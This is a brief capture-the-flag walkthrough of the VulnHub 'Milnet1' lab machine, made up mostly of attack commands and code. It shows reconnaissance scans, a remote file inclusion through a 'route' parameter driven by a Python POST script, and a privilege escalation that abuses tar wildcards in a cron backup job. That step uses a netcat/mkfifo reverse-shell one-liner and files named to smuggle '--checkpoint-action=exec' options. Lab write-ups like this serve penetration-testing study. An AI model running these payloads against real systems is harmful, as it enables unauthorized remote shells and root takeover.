Milnet1

Tools:

  • netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • Tamper Data

Use netdiscover to detect target IP address

netdiscover -i eth0 -r 192.168.41.0/24

192.168.41.154 is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.41.154 -p-

port 22 and 80 are opening

use nmap to run http-enum script:

nmap 192.168.41.154 -p80 --script http-enum

The info.php file exists.

use nikto to scan

nikto -h 192.168.41.154

use wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.41.154/FUZZ 2>/dev/null

nothing cool.

I use Tamper Data to exam the GET/POST request parameters.

find an interesting parameter. setup a netcat listerner, and change the parameter value to http://192.168.41.149/reverse?

(Here, at first I used reverse.php which created a local reverse shell back to my Kali. I guess there is a filter in target can filter php file, so I just remove .php)

get the shell:

In order to make the process easier, I create a short script send_post.py:

send_post.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

#!/usr/bin/env python
#send post requst to the target

import requests
import json

url= 'http://192.168.41.154/content.php'

headers = {
  "Host" : "192.168.41.154",
  "User-Agent" : "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0",
  "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  "Accept-Language" : "en-US,en;q=0.5",
  "Accept-Encoding" : "gzip, deflate",
  "Referer" : "http://192.168.41.154/nav.php",
  "Connection" : "keep-alive",
  "Content-Type" : "application/x-www-form-urlencoded",
  "Content-Length" : "40"
}

payload = {
  "route" : "http://192.168.41.149/reverse?"
}


r = requests.post(url, headers=headers, data=payload)
print (r.status_code)

Next enumeration, no luck on kernerl exploit, check contab job.

cat /etc/cron*

got /etc/crontab

read that file

cat /etc/crontab

found an interesting file: /backup/backup.sh

check that file

it uses tar. Searched exploits, no luck.

Under path /home/langman/SDINET, I found a file DefenseCode_Unix_WildCards_Gone_Wild.txt shows tar cdode execution,

in kali:

nc -nlvp 443

in target:

send_post.py
1
2
3

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.41.149 443 > /tmp/f" > shell.sh
$ touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
$ touch "/var/www/html/--checkpoint=1"

get the root:

lfi, rfi, vulhub